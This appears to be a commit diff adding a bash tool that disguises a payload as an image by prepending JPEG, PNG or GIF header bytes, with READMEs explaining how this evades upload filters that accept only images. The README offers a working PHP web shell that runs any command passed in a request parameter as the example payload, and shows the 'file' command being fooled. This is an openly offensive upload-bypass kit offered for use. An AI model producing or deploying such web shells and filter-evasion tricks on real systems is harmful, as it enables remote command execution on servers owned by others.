Makes a script to disguise a payload as an image

bin/.bin/payload-generation/README.md

@@ -0,0 +1,36 @@
+# Scripts for payload generation
+
+## generateImageFromPayload
+
+This script is designed to disguise a payload as an image. It does this by adding the first 20 bytes of a real image to the beginning of the file and adding a file extension. This will fool most filters that, for example, might only allow images to be uploaded.
+
+To use it, you will need to have a payload ready to use. It could be anything, here is a simple php script named payload.php
+
+```php
+<?php
+if( isset( $_REQUEST['jh'] ) ):
+	system( $_REQUEST['jh'] );
+endif;
+```
+
+If I run `generateImageFromPayload payload.php`, the script will create a file called `payload.php.jpg`.
+
+```
+.
+├── payload.php
+└── payload.php.jpg
+```
+
+After running `file` on both, you will see that it incorrectly identifies the second as an image.
+
+```sh
+file payload.php*
+payload.php:     PHP script, ASCII text
+payload.php.jpg: JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16
+```
+
+The script will, by default, generate a jpg although you can specify png or gif by adding a second argument, e.g.
+
+```
+generateImageFromPayload payload.php png
+```

bin/.bin/payload-generation/generateImageFromPayload

@@ -0,0 +1,65 @@
+#!/usr/bin/env bash
+
+# This script takes a payload and disguises it as an image.
+
+SCRIPTPATH="$( cd "$(dirname "$0")" ; pwd -P )"
+CURRENT=$(pwd)
+
+PAYLOAD="$1"
+IMAGETYPE="${2:-jpg}"
+# Make sure the image type is lower case
+IMAGETYPE=$(echo "$IMAGETYPE" | tr '[:upper:]' '[:lower:]')
+
+# This function prints the usage
+function printUsage(){
+	echo "Usage: $(basename "$0") PAYLOAD TYPE"
+	echo ""
+	echo "Disguises a payload as an image"
+	echo ""
+	echo -e "PAYLOAD\t\tThe payload to use, currently only supports a file in CWD (Required)"
+	echo -e "TYPE\t\tThe type of image (jpg, png, gif) (default: jpg)"
+}
+
+function getPayload(){
+	local payload="$CURRENT/$PAYLOAD"
+	echo "$payload"
+	if [ -f "$payload" ]; then
+		exit 0
+	else
+		# Add stuff here if we want to look in another folder for payloads at some point
+		exit 1
+	fi
+}
+
+function getTemplate(){
+	local template="$SCRIPTPATH/templates/payload.$IMAGETYPE"
+	echo "$template"
+	if [ -f "$template" ]; then
+		exit 0
+	else
+		exit 1
+	fi
+}
+
+function getDestination(){
+	echo "$CURRENT/$PAYLOAD.$IMAGETYPE"
+	exit 0
+}
+
+if template=$(getTemplate); then
+	if payload=$(getPayload); then
+		# Do copy stuff
+		destination=$(getDestination)
+		cp "$template" "$destination"
+		cat "$payload" >> $destination
+	else
+		"No such payload $payload"
+		echo ""
+		printUsage
+	fi
+else
+	echo "No such template $template"
+	echo ""
+	printUsage
+	exit 1
+fi

bin/.bin/payload-generation/templates/README.md

@@ -0,0 +1,5 @@
+# Image templates
+
+These images are not real images. They take the first 20 bites of an example image of each type.
+
+By adding code to these, you will be able to evade many upload filters that only allow images